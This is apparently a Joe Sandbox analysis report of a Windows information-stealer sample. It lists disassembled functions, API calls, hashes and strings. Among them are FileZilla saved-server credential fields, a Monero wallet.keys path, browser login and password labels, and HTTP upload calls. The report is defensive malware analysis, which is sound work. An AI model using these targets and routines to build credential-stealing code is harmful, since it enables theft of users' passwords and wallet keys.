API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: b40b8293c160e4f7d727e97016b0f249ef0eba1deef37150d98ddc4b14f4c407
Instruction ID: 2a0cc0f9a9e411123b1b2fc7e586d8f2fd2a64893e6138ab25a244afc3f1eb53
Opcode Fuzzy Hash: b40b8293c160e4f7d727e97016b0f249ef0eba1deef37150d98ddc4b14f4c407
Instruction Fuzzy Hash: 7ED11E71910208ABCF04EBF8DD96EEE7778FF99304F544518F106A7091EE34AA06CBA5

Function 00985100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Part of subcall function 009847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00984839
Part of subcall function 009847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00984849

lstrlen.KERNEL32(00000000), ref: 00985193

Part of subcall function 00998EA0: CryptBinaryToStringA.CRYPT32(00000000,00985184,40000001,00000000,00000000,?,00985184), ref: 00998EC0

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00985207
StrCmpCA.SHLWAPI(?,0157E538), ref: 00985225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00985340
HttpOpenRequestA.WININET(00000000,0157E598,?,0157DCA8,00000000,00000000,00400100,00000000), ref: 009853A4

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0157E548,00000000,?,0157CC98,00000000,?,009A19DC,00000000,?,009951CF), ref: 00985737
lstrlen.KERNEL32(00000000), ref: 0098574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0098575C
RtlAllocateHeap.NTDLL(00000000), ref: 00985763
lstrlen.KERNEL32(00000000), ref: 00985778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009857A9
lstrlen.KERNEL32(00000000), ref: 009857C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009857E1
lstrlen.KERNEL32(00000000,?,?), ref: 0098580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00985822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0098584D
InternetCloseHandle.WININET(00000000), ref: 009858B1
InternetCloseHandle.WININET(00000000), ref: 009858BE
InternetCloseHandle.WININET(00000000), ref: 009858C8

Strings

------, xrefs: 00985297
", xrefs: 009855C4
------, xrefs: 009854F9
------, xrefs: 0098563B
", xrefs: 00985482
", xrefs: 00985706
--, xrefs: 00985280
------, xrefs: 009853B7

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: 3043228d9fdb83174b1babb590c2d3e8eebd7af41c0a46171bd36ab54e3e9772
Instruction ID: 47a8b10c135045a3580da3c537b18f9f9db2874ce2f31188da1bdee8931f9d44
Opcode Fuzzy Hash: 3043228d9fdb83174b1babb590c2d3e8eebd7af41c0a46171bd36ab54e3e9772
Instruction Fuzzy Hash: 2E320F71920128ABDF14EBA5DC95FEEB378FF94700F404199B10663192EF706A49CFA6

Function 0098A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0099AA70: StrCmpCA.SHLWAPI(01579478,0098A7A7,?,0098A7A7,01579478), ref: 0099AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0098AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0098AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0098ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0098A8B0

Part of subcall function 0099A820: lstrlen.KERNEL32(00984F05,?,?,00984F05,009A0DDE), ref: 0099A82B
Part of subcall function 0099A820: lstrcpy.KERNEL32(009A0DDE,00000000), ref: 0099A885

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

lstrcat.KERNEL32(?,00000000), ref: 0098ACEB
lstrcat.KERNEL32(?,009A1320), ref: 0098ACFA
lstrcat.KERNEL32(?,00000000), ref: 0098AD0D
lstrcat.KERNEL32(?,009A1324), ref: 0098AD1C
lstrcat.KERNEL32(?,00000000), ref: 0098AD2F
lstrcat.KERNEL32(?,009A1328), ref: 0098AD3E
lstrcat.KERNEL32(?,00000000), ref: 0098AD51
lstrcat.KERNEL32(?,009A132C), ref: 0098AD60
lstrcat.KERNEL32(?,00000000), ref: 0098AD73
lstrcat.KERNEL32(?,009A1330), ref: 0098AD82
lstrcat.KERNEL32(?,00000000), ref: 0098AD95
lstrcat.KERNEL32(?,009A1334), ref: 0098ADA4
lstrcat.KERNEL32(?,00000000), ref: 0098ADB7
lstrlen.KERNEL32(?), ref: 0098AE0D
lstrlen.KERNEL32(?), ref: 0098AE1C

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

DeleteFileA.KERNEL32(00000000), ref: 0098AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0098ABD4

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: e3479d82d2225c62efdb84c807b92187d525576f0a445a4f1722c8c4e6f7cf73
Instruction ID: db3503bc98eb3121fb305bc7660c80098956588efd172e3aa689a07c7edb3869
Opcode Fuzzy Hash: e3479d82d2225c62efdb84c807b92187d525576f0a445a4f1722c8c4e6f7cf73
Instruction Fuzzy Hash: A6123E719101189BDF08FBA4DD96FEE7378FF98304F504019B506A71A1DE34AE0ACBA6

Function 00985960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Part of subcall function 009847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00984839
Part of subcall function 009847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00984849

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009859F8
StrCmpCA.SHLWAPI(?,0157E538), ref: 00985A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00985B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0157E498,00000000,?,0157CC98,00000000,?,009A1A1C), ref: 00985E71
lstrlen.KERNEL32(00000000), ref: 00985E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00985E93
RtlAllocateHeap.NTDLL(00000000), ref: 00985E9A
lstrlen.KERNEL32(00000000), ref: 00985EAF
lstrlen.KERNEL32(00000000), ref: 00985ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00985EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00985F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00985F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00985F4C
InternetCloseHandle.WININET(00000000), ref: 00985FB0
InternetCloseHandle.WININET(00000000), ref: 00985FBD
HttpOpenRequestA.WININET(00000000,0157E598,?,0157DCA8,00000000,00000000,00400100,00000000), ref: 00985BF8

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

InternetCloseHandle.WININET(00000000), ref: 00985FC7

Strings

------, xrefs: 00985D4C
------, xrefs: 00985A96
", xrefs: 00985CD5
", xrefs: 00985E16
------, xrefs: 00985C0B

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 0c771efe3f53aaa155c65e931facc700e024d5cc5e5843d27b6c7d4cff697418
Instruction ID: aed9ff78fdf6d2bfdaddf5d138a6a2245f4be2d172b4226f847f88aef65ede55
Opcode Fuzzy Hash: 0c771efe3f53aaa155c65e931facc700e024d5cc5e5843d27b6c7d4cff697418
Instruction Fuzzy Hash: A712DB71820128ABDF15EBA5DC96FEEB378FF94700F504199B10A62191EF702A49CFA5

Function 0098CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 00998B60: GetSystemTime.KERNEL32(009A0E1A,0157CC08,009A05AE,?,?,009813F9,?,0000001A,009A0E1A,00000000,?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 00998B86

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0098CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0098D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0098D0CE
lstrcat.KERNEL32(?,00000000), ref: 0098D208
lstrcat.KERNEL32(?,009A1478), ref: 0098D217
lstrcat.KERNEL32(?,00000000), ref: 0098D22A
lstrcat.KERNEL32(?,009A147C), ref: 0098D239
lstrcat.KERNEL32(?,00000000), ref: 0098D24C
lstrcat.KERNEL32(?,009A1480), ref: 0098D25B
lstrcat.KERNEL32(?,00000000), ref: 0098D26E
lstrcat.KERNEL32(?,009A1484), ref: 0098D27D
lstrcat.KERNEL32(?,00000000), ref: 0098D290
lstrcat.KERNEL32(?,009A1488), ref: 0098D29F
lstrcat.KERNEL32(?,00000000), ref: 0098D2B2
lstrcat.KERNEL32(?,009A148C), ref: 0098D2C1
lstrcat.KERNEL32(?,00000000), ref: 0098D2D4
lstrcat.KERNEL32(?,009A1490), ref: 0098D2E3

Part of subcall function 0099A820: lstrlen.KERNEL32(00984F05,?,?,00984F05,009A0DDE), ref: 0099A82B
Part of subcall function 0099A820: lstrcpy.KERNEL32(009A0DDE,00000000), ref: 0099A885

lstrlen.KERNEL32(?), ref: 0098D32A
lstrlen.KERNEL32(?), ref: 0098D339

Part of subcall function 0099AA70: StrCmpCA.SHLWAPI(01579478,0098A7A7,?,0098A7A7,01579478), ref: 0099AA8F

DeleteFileA.KERNEL32(00000000), ref: 0098D3B4

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 3293da65212277cc3386b10d1cccd0d00361b869941afaa50b593ab21f11ecfa
Instruction ID: d0a9ea613eb83209cc95883e60765d8c1f68ce84c136dbc6719e25ee1fba9e87
Opcode Fuzzy Hash: 3293da65212277cc3386b10d1cccd0d00361b869941afaa50b593ab21f11ecfa
Instruction Fuzzy Hash: 8DE13C71910108ABCF04EBA8DD96FEE7379FF98305F104158F106A71A1DE35AE05CBA6

Function 00998320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

RegOpenKeyExA.KERNEL32(00000000,0156CA50,00000000,00020019,00000000,009A05B6), ref: 009983A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00998426
wsprintfA.USER32 ref: 00998459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0099847B
RegCloseKey.ADVAPI32(00000000), ref: 0099848C
RegCloseKey.ADVAPI32(00000000), ref: 00998499

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Strings

- , xrefs: 009985A3
?, xrefs: 0099837A
%s\%s, xrefs: 0099844D

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 9febbe9d4f0d7c4f820e74c1d34c1c17df6e6771903b0164239c9eaa8ec7f5ad
Instruction ID: 369ad0806dfd8542999dd0cfcd39d5d6ead704da7dfb2cf200eaab283e672f85
Opcode Fuzzy Hash: 9febbe9d4f0d7c4f820e74c1d34c1c17df6e6771903b0164239c9eaa8ec7f5ad
Instruction Fuzzy Hash: 8D8108B191011CABDB24DB64CC95FEAB7B8FF48704F008699E109A6180DF756B85CFE5

Function 00986280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Part of subcall function 009847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00984839
Part of subcall function 009847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00984849

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

InternetOpenA.WININET(009A0DFE,00000001,00000000,00000000,00000000), ref: 009862E1
StrCmpCA.SHLWAPI(?,0157E538), ref: 00986303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00986335
HttpOpenRequestA.WININET(00000000,GET,?,0157DCA8,00000000,00000000,00400100,00000000), ref: 00986385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009863BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009863D1
